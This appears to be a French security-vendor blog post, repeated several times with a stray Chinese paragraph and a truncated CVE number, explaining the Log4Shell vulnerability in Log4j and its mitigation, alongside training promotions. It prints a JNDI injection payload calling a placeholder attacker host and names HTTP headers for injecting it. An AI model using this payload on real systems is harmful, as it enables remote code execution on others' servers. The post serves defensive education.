Examen approfondi de la vulnérabilité Log4j : vecteurs d'attaque et méthodes de prévention
Le 9 décembre, une vulnérabilité zero-day dans la bibliothèque Java Log4j a été révélée. CVE-44228, surnommée Log4Shell,a été classéecomme« trèsgrave» car elle peutpermettre l'exécution de code à distance. De plus, log4j-core étant l'une des bibliothèques de journalisation Java les plus utilisées, elle met en danger des millions d'applications.
Souhaitez-vous améliorer rapidement vos compétences en matière de gestion de Log4Shell ?
Nous avons créé une vitrine qui vous guide depuis les concepts de base de Log4Shell jusqu'à l'expérience pratique de l'exploitation de cette vulnérabilité dans un simulateur appelé Mission. Dans cette mission, nous vous guiderons à travers l'impact de la vulnérabilité Log4j sur votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour en savoir plus sur cette vulnérabilité.
Des informations anciennes ?
Cette vulnérabilité n'est pas nouvelle. Les chercheurs en sécurité l'ont déjà soulignée lors de la conférence BlackHat 2016. Álvaro Muñoz et Oleksandr Mirosh ont insisté sur le fait que «les applications ne devraient pas utiliser des données non fiables pour exécuter des requêtes JNDI » etont expliqué comment une injection JNDI/LDAP ciblée pouvait conduire à l'exécution de code à distance. C'est précisément le cœur du problème avec Log4Shell.
Vecteur d'attaque
La charge d'injection de Log4Shell est présentée ci-dessous :
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Ensuite, il y a JNDI, ou Java Naming and Directory Interface,une API qui permet de se connecter à des services à l'aide de protocoles tels que LDAP, DNS, RMI, etc. pour récupérer des données ou des ressources. En résumé, dans l'exemple de charge malveillante ci-dessus, JNDI effectue une requête sur le serveur LDAP contrôlé par l'attaquant. Par exemple, sa réponse peut pointer vers un fichier de classe Java contenant du code malveillant qui, en retour, s'exécutera sur le serveur vulnérable.
Cette vulnérabilité est particulièrement préoccupante car Log4j évalue toutes les entrées de journal et interroge toutes les entrées utilisateur enregistrées écrites dans le langage EL préfixées par « jndi ». Une charge utile peut être injectée à n'importe quel endroit où l'utilisateur peut saisir des données, par exemple dans les champs d'un formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter une charge utile.
Pour découvrir par vous-même les failles, veuillez vous rendre dans notre espace d'exposition et passer à l'étape 2 : « Découvrezl'impact ».
Prévention : sensibilisation
Il est recommandé de mettre à jour toutes les applications, car Log4j continue de corriger les codes vulnérables. Cependant, les versions 2.15.0 et 2.16.0 contiennent des vulnérabilités DDoS et autres, ce qui signifie qu'à partir de fin décembre, il est conseillé de passer à la version 2.17.0.
Lorsque les développeurs écrivent du code, nous devons toujours tenir compte de la sécurité. Log4Shell nous montre que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que l'utilisation de ressources externes peut compromettre la sécurité de nos applications, alors que nous considérons naïvement ces ressources externes comme sûres.
Cette vulnérabilité peut-elle être évitée ? Oui et non. D'une part, ce n'est qu'en introduisant des composants vulnérables via des logiciels tiers que les développeurs peuvent faire davantage. D'autre part, la leçon à en tirer est une leçon qui se répète sans cesse : ne jamais se fier aux entrées des utilisateurs.
Secure Code Warrior estime que des développeurs sensibilisés à la sécurité constituent le meilleur moyen de prévenir les failles de code. Grâce à la formation à grande échelle dispensée par SCW sur des frameworks de programmation spécifiques, les entreprises clientes peuvent rapidement identifier les développeurs Java concernés à l'aide des données du rapport. Elles s'appuient également sur des responsables de la sécurité formés par SCW pour accélérer la mise à niveau de Log4j.
Secure Code Warrior Senseiplugin IntelliJ Sensei, particulièrement destiné aux développeurs Java. Cet outil d'analyse de code basé sur des règles permet d'appliquer des directives de codage et de prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos règles prêtes à l'emploi, appelées « recettes». Nous vous invitons àconsulter nos recettes et à téléchargernotre recette Log4j, qui vous aidera à identifier et corriger la vulnérabilité Log4Shell en un clin d'œil.
Renforcez vos compétences en matière de défense contre Log4Shell
Souhaitez-vous mettre en pratique les connaissances acquises dans cet article de blog ? Notre vitrine peut vous y aider. Au début de la démonstration, vous découvrirez rapidement cette vulnérabilité, puis vous serez dirigé vers un environnement simulé où vous pourrez tester la vulnérabilité en suivant les instructions fournies.
En décembre 2021, une faille de sécurité majeure, baptisée Log4Shell, a été découverte dans la bibliothèque Java Log4j. Dans cet article, nous décomposons la faille Log4Shell dans sa forme la plus simple afin de vous permettre d'acquérir les connaissances de base nécessaires. Nous vous proposons également une tâche : un terrain de jeu où vous pouvez mettre en pratique vos connaissances sur cette faille en essayant d'attaquer un site web simulé.
Secure Code Warrior peut aider votre organisation à sécuriser le code tout au long du cycle de vie du développement logiciel et à instaurer une culture qui accorde la priorité à la cybersécurité. Que vous soyez responsable de la sécurité des applications, développeur, directeur de la sécurité de l'information ou tout autre professionnel concerné par la sécurité, nous pouvons aider votre organisation à réduire les risques liés au code non sécurisé.
Veuillez réserver une démonstration.
Laura Verheyde est développeuse de logiciels à l'adresse Secure Code Warrior . Elle se consacre à la recherche de vulnérabilités et à la création de contenu pour Missions et Coding labs.
Le 9 décembre, une vulnérabilité zero-day dans la bibliothèque Java Log4j a été révélée. CVE-44228, surnommée Log4Shell,a été classéecomme« trèsgrave» car elle peutpermettre l'exécution de code à distance. De plus, log4j-core étant l'une des bibliothèques de journalisation Java les plus utilisées, elle met en danger des millions d'applications.
Souhaitez-vous améliorer rapidement vos compétences en matière de gestion de Log4Shell ?
Nous avons créé une vitrine qui vous guide depuis les concepts de base de Log4Shell jusqu'à l'expérience pratique de l'exploitation de cette vulnérabilité dans un simulateur appelé Mission. Dans cette mission, nous vous guiderons à travers l'impact de la vulnérabilité Log4j sur votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour en savoir plus sur cette vulnérabilité.
Des informations anciennes ?
Cette vulnérabilité n'est pas nouvelle. Les chercheurs en sécurité l'ont déjà soulignée lors de la conférence BlackHat 2016. Álvaro Muñoz et Oleksandr Mirosh ont insisté sur le fait que «les applications ne devraient pas utiliser des données non fiables pour exécuter des requêtes JNDI » etont expliqué comment une injection JNDI/LDAP ciblée pouvait conduire à l'exécution de code à distance. C'est précisément le cœur du problème avec Log4Shell.
Vecteur d'attaque
La charge d'injection de Log4Shell est présentée ci-dessous :
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Ensuite, il y a JNDI, ou Java Naming and Directory Interface,une API qui permet de se connecter à des services à l'aide de protocoles tels que LDAP, DNS, RMI, etc. pour récupérer des données ou des ressources. En résumé, dans l'exemple de charge malveillante ci-dessus, JNDI effectue une requête sur le serveur LDAP contrôlé par l'attaquant. Par exemple, sa réponse peut pointer vers un fichier de classe Java contenant du code malveillant qui, en retour, s'exécutera sur le serveur vulnérable.
Cette vulnérabilité est particulièrement préoccupante car Log4j évalue toutes les entrées de journal et interroge toutes les entrées utilisateur enregistrées écrites dans le langage EL préfixées par « jndi ». Une charge utile peut être injectée à n'importe quel endroit où l'utilisateur peut saisir des données, par exemple dans les champs d'un formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter une charge utile.
Pour découvrir par vous-même les failles, veuillez vous rendre dans notre espace d'exposition et passer à l'étape 2 : « Découvrezl'impact ».
Prévention : sensibilisation
Il est recommandé de mettre à jour toutes les applications, car Log4j continue de corriger les codes vulnérables. Cependant, les versions 2.15.0 et 2.16.0 contiennent des vulnérabilités DDoS et autres, ce qui signifie qu'à partir de fin décembre, il est conseillé de passer à la version 2.17.0.
Lorsque les développeurs écrivent du code, nous devons toujours tenir compte de la sécurité. Log4Shell nous montre que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que l'utilisation de ressources externes peut compromettre la sécurité de nos applications, alors que nous considérons naïvement ces ressources externes comme sûres.
Cette vulnérabilité peut-elle être évitée ? Oui et non. D'une part, ce n'est qu'en introduisant des composants vulnérables via des logiciels tiers que les développeurs peuvent faire davantage. D'autre part, la leçon à en tirer est une leçon qui se répète sans cesse : ne jamais se fier aux entrées des utilisateurs.
Secure Code Warrior estime que des développeurs sensibilisés à la sécurité constituent le meilleur moyen de prévenir les failles de code. Grâce à la formation à grande échelle dispensée par SCW sur des frameworks de programmation spécifiques, les entreprises clientes peuvent rapidement identifier les développeurs Java concernés à l'aide des données du rapport. Elles s'appuient également sur des responsables de la sécurité formés par SCW pour accélérer la mise à niveau de Log4j.
Secure Code Warrior Senseiplugin IntelliJ Sensei, particulièrement destiné aux développeurs Java. Cet outil d'analyse de code basé sur des règles permet d'appliquer des directives de codage et de prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos règles prêtes à l'emploi, appelées « recettes». Nous vous invitons àconsulter nos recettes et à téléchargernotre recette Log4j, qui vous aidera à identifier et corriger la vulnérabilité Log4Shell en un clin d'œil.
Renforcez vos compétences en matière de défense contre Log4Shell
Souhaitez-vous mettre en pratique les connaissances acquises dans cet article de blog ? Notre vitrine peut vous y aider. Au début de la démonstration, vous découvrirez rapidement cette vulnérabilité, puis vous serez dirigé vers un environnement simulé où vous pourrez tester la vulnérabilité en suivant les instructions fournies.
Le 9 décembre, une vulnérabilité zero-day dans la bibliothèque Java Log4j a été révélée. CVE-44228, surnommée Log4Shell,a été classéecomme« trèsgrave» car elle peutpermettre l'exécution de code à distance. De plus, log4j-core étant l'une des bibliothèques de journalisation Java les plus utilisées, elle met en danger des millions d'applications.
Souhaitez-vous améliorer rapidement vos compétences en matière de gestion de Log4Shell ?
Nous avons créé une vitrine qui vous guide depuis les concepts de base de Log4Shell jusqu'à l'expérience pratique de l'exploitation de cette vulnérabilité dans un simulateur appelé Mission. Dans cette mission, nous vous guiderons à travers l'impact de la vulnérabilité Log4j sur votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour en savoir plus sur cette vulnérabilité.
Des informations anciennes ?
Cette vulnérabilité n'est pas nouvelle. Les chercheurs en sécurité l'ont déjà soulignée lors de la conférence BlackHat 2016. Álvaro Muñoz et Oleksandr Mirosh ont insisté sur le fait que «les applications ne devraient pas utiliser des données non fiables pour exécuter des requêtes JNDI » etont expliqué comment une injection JNDI/LDAP ciblée pouvait conduire à l'exécution de code à distance. C'est précisément le cœur du problème avec Log4Shell.
Vecteur d'attaque
La charge d'injection de Log4Shell est présentée ci-dessous :
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Ensuite, il y a JNDI, ou Java Naming and Directory Interface,une API qui permet de se connecter à des services à l'aide de protocoles tels que LDAP, DNS, RMI, etc. pour récupérer des données ou des ressources. En résumé, dans l'exemple de charge malveillante ci-dessus, JNDI effectue une requête sur le serveur LDAP contrôlé par l'attaquant. Par exemple, sa réponse peut pointer vers un fichier de classe Java contenant du code malveillant qui, en retour, s'exécutera sur le serveur vulnérable.
Cette vulnérabilité est particulièrement préoccupante car Log4j évalue toutes les entrées de journal et interroge toutes les entrées utilisateur enregistrées écrites dans le langage EL préfixées par « jndi ». Une charge utile peut être injectée à n'importe quel endroit où l'utilisateur peut saisir des données, par exemple dans les champs d'un formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter une charge utile.
Pour découvrir par vous-même les failles, veuillez vous rendre dans notre espace d'exposition et passer à l'étape 2 : « Découvrezl'impact ».
Prévention : sensibilisation
Il est recommandé de mettre à jour toutes les applications, car Log4j continue de corriger les codes vulnérables. Cependant, les versions 2.15.0 et 2.16.0 contiennent des vulnérabilités DDoS et autres, ce qui signifie qu'à partir de fin décembre, il est conseillé de passer à la version 2.17.0.
Lorsque les développeurs écrivent du code, nous devons toujours tenir compte de la sécurité. Log4Shell nous montre que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que l'utilisation de ressources externes peut compromettre la sécurité de nos applications, alors que nous considérons naïvement ces ressources externes comme sûres.
Cette vulnérabilité peut-elle être évitée ? Oui et non. D'une part, ce n'est qu'en introduisant des composants vulnérables via des logiciels tiers que les développeurs peuvent faire davantage. D'autre part, la leçon à en tirer est une leçon qui se répète sans cesse : ne jamais se fier aux entrées des utilisateurs.
Secure Code Warrior estime que des développeurs sensibilisés à la sécurité constituent le meilleur moyen de prévenir les failles de code. Grâce à la formation à grande échelle dispensée par SCW sur des frameworks de programmation spécifiques, les entreprises clientes peuvent rapidement identifier les développeurs Java concernés à l'aide des données du rapport. Elles s'appuient également sur des responsables de la sécurité formés par SCW pour accélérer la mise à niveau de Log4j.
Secure Code Warrior Senseiplugin IntelliJ Sensei, particulièrement destiné aux développeurs Java. Cet outil d'analyse de code basé sur des règles permet d'appliquer des directives de codage et de prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos règles prêtes à l'emploi, appelées « recettes». Nous vous invitons àconsulter nos recettes et à téléchargernotre recette Log4j, qui vous aidera à identifier et corriger la vulnérabilité Log4Shell en un clin d'œil.
Renforcez vos compétences en matière de défense contre Log4Shell
Souhaitez-vous mettre en pratique les connaissances acquises dans cet article de blog ? Notre vitrine peut vous y aider. Au début de la démonstration, vous découvrirez rapidement cette vulnérabilité, puis vous serez dirigé vers un environnement simulé où vous pourrez tester la vulnérabilité en suivant les instructions fournies.
Veuillez cliquer sur le lien ci-dessous pour télécharger le PDF de cette ressource.
Secure Code Warrior peut aider votre organisation à sécuriser le code tout au long du cycle de vie du développement logiciel et à instaurer une culture qui accorde la priorité à la cybersécurité. Que vous soyez responsable de la sécurité des applications, développeur, directeur de la sécurité de l'information ou tout autre professionnel concerné par la sécurité, nous pouvons aider votre organisation à réduire les risques liés au code non sécurisé.
Veuillez consulter le rapport.Veuillez réserver une démonstration.
Laura Verheyde est développeuse de logiciels à l'adresse Secure Code Warrior . Elle se consacre à la recherche de vulnérabilités et à la création de contenu pour Missions et Coding labs.
Le 9 décembre, une vulnérabilité zero-day dans la bibliothèque Java Log4j a été révélée. CVE-44228, surnommée Log4Shell,a été classéecomme« trèsgrave» car elle peutpermettre l'exécution de code à distance. De plus, log4j-core étant l'une des bibliothèques de journalisation Java les plus utilisées, elle met en danger des millions d'applications.
Souhaitez-vous améliorer rapidement vos compétences en matière de gestion de Log4Shell ?
Nous avons créé une vitrine qui vous guide depuis les concepts de base de Log4Shell jusqu'à l'expérience pratique de l'exploitation de cette vulnérabilité dans un simulateur appelé Mission. Dans cette mission, nous vous guiderons à travers l'impact de la vulnérabilité Log4j sur votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour en savoir plus sur cette vulnérabilité.
Des informations anciennes ?
Cette vulnérabilité n'est pas nouvelle. Les chercheurs en sécurité l'ont déjà soulignée lors de la conférence BlackHat 2016. Álvaro Muñoz et Oleksandr Mirosh ont insisté sur le fait que «les applications ne devraient pas utiliser des données non fiables pour exécuter des requêtes JNDI » etont expliqué comment une injection JNDI/LDAP ciblée pouvait conduire à l'exécution de code à distance. C'est précisément le cœur du problème avec Log4Shell.
Vecteur d'attaque
La charge d'injection de Log4Shell est présentée ci-dessous :
$ {jndi: ldap: //attacker.host/xyz}
要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。
Ensuite, il y a JNDI, ou Java Naming and Directory Interface,une API qui permet de se connecter à des services à l'aide de protocoles tels que LDAP, DNS, RMI, etc. pour récupérer des données ou des ressources. En résumé, dans l'exemple de charge malveillante ci-dessus, JNDI effectue une requête sur le serveur LDAP contrôlé par l'attaquant. Par exemple, sa réponse peut pointer vers un fichier de classe Java contenant du code malveillant qui, en retour, s'exécutera sur le serveur vulnérable.
Cette vulnérabilité est particulièrement préoccupante car Log4j évalue toutes les entrées de journal et interroge toutes les entrées utilisateur enregistrées écrites dans le langage EL préfixées par « jndi ». Une charge utile peut être injectée à n'importe quel endroit où l'utilisateur peut saisir des données, par exemple dans les champs d'un formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter une charge utile.
Pour découvrir par vous-même les failles, veuillez vous rendre dans notre espace d'exposition et passer à l'étape 2 : « Découvrezl'impact ».
Prévention : sensibilisation
Il est recommandé de mettre à jour toutes les applications, car Log4j continue de corriger les codes vulnérables. Cependant, les versions 2.15.0 et 2.16.0 contiennent des vulnérabilités DDoS et autres, ce qui signifie qu'à partir de fin décembre, il est conseillé de passer à la version 2.17.0.
Lorsque les développeurs écrivent du code, nous devons toujours tenir compte de la sécurité. Log4Shell nous montre que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que l'utilisation de ressources externes peut compromettre la sécurité de nos applications, alors que nous considérons naïvement ces ressources externes comme sûres.
Cette vulnérabilité peut-elle être évitée ? Oui et non. D'une part, ce n'est qu'en introduisant des composants vulnérables via des logiciels tiers que les développeurs peuvent faire davantage. D'autre part, la leçon à en tirer est une leçon qui se répète sans cesse : ne jamais se fier aux entrées des utilisateurs.
Secure Code Warrior estime que des développeurs sensibilisés à la sécurité constituent le meilleur moyen de prévenir les failles de code. Grâce à la formation à grande échelle dispensée par SCW sur des frameworks de programmation spécifiques, les entreprises clientes peuvent rapidement identifier les développeurs Java concernés à l'aide des données du rapport. Elles s'appuient également sur des responsables de la sécurité formés par SCW pour accélérer la mise à niveau de Log4j.
Secure Code Warrior Senseiplugin IntelliJ Sensei, particulièrement destiné aux développeurs Java. Cet outil d'analyse de code basé sur des règles permet d'appliquer des directives de codage et de prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos règles prêtes à l'emploi, appelées « recettes». Nous vous invitons àconsulter nos recettes et à téléchargernotre recette Log4j, qui vous aidera à identifier et corriger la vulnérabilité Log4Shell en un clin d'œil.
Renforcez vos compétences en matière de défense contre Log4Shell
Souhaitez-vous mettre en pratique les connaissances acquises dans cet article de blog ? Notre vitrine peut vous y aider. Au début de la démonstration, vous découvrirez rapidement cette vulnérabilité, puis vous serez dirigé vers un environnement simulé où vous pourrez tester la vulnérabilité en suivant les instructions fournies.
Table des matières
Secure Code Warrior peut aider votre organisation à sécuriser le code tout au long du cycle de vie du développement logiciel et à instaurer une culture qui accorde la priorité à la cybersécurité. Que vous soyez responsable de la sécurité des applications, développeur, directeur de la sécurité de l'information ou tout autre professionnel concerné par la sécurité, nous pouvons aider votre organisation à réduire les risques liés au code non sécurisé.
Veuillez réserver une démonstration.TéléchargerRessources pour vous aider à démarrer
Formation sur les codes de sécurité : thèmes et contenu
Notre contenu de pointe évolue constamment pour s'adapter au paysage changeant du développement logiciel, tout en tenant compte de votre rôle. Les sujets abordés couvrent tout, de l'IA à l'injection XQuery, et s'adressent à divers postes, des architectes et ingénieurs aux chefs de produit et responsables de l'assurance qualité. Découvrez un aperçu par thème et par rôle de ce que notre catalogue de contenu a à offrir.
La Chambre de commerce établit la norme en matière de sécurité à grande échelle axée sur les développeurs
La Chambre de commerce néerlandaise explique comment elle a intégré le codage sécurisé dans le développement quotidien grâce à des certifications basées sur les rôles, à l'évaluation comparative du Trust Score et à une culture de responsabilité partagée en matière de sécurité.
%20(1).avif)
.avif)
Modélisation des menaces avec l'IA : transformer chaque développeur en modélisateur de menaces
Vous repartirez mieux équipé pour aider les développeurs à combiner les idées et les techniques de modélisation des menaces avec les outils d'IA qu'ils utilisent déjà pour renforcer la sécurité, améliorer la collaboration et créer des logiciels plus résilients dès le départ.
Ressources pour vous aider à démarrer
Cybermon est de retour : la mission AI pour vaincre le boss est désormais disponible sur demande.
Cybermon 2025 : la campagne « Vaincre le boss » est désormais disponible toute l'année dans SCW. La guerre de sécurité avancée de l'IA/LLM tribale, le renforcement de l'IA de sécurité à grande échelle.
Interprétation de la loi sur la résilience des réseaux : que signifie la sécurité par le biais de la conception et du développement de logiciels ?
Comprenez les exigences de la loi européenne sur la résilience des réseaux (CRA), à qui elle s'applique et comment les équipes d'ingénierie peuvent s'y préparer grâce à des pratiques de conception, à la prévention des vulnérabilités et au renforcement des capacités des développeurs.
Facteur déterminant 1 : des critères de réussite clairs et mesurables
Le catalyseur n° 1 constitue le premier volet de notre série en dix parties consacrée aux facteurs de réussite. Il démontre comment relier la sécurité du code aux résultats opérationnels, tels que la réduction des risques et l'accélération de la maturité des programmes à long terme.
